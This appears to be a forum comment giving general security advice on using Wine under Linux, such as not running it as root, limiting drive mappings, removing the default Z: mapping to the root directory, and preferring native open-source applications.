We've known about this for years. As others have posted, don't run Wine as root, only run it as your account. Only map drives in Wine that you absolutely need, and restrict them as much as possible. I would strongly suggest removing the default drive of Z: which points to / . As long as we need to use Wine, we'll always have the risk of viruses getting through, it's just the nature of the beast. Personally I only use Wine for running games and a few apps that I must have that I can't find Linux replacements for. But overall, it's worth using native GNU/Linux applications wherever possible. Find a replacement for all apps like Adobe, etc, and enjoy the freedom of open source at the same time.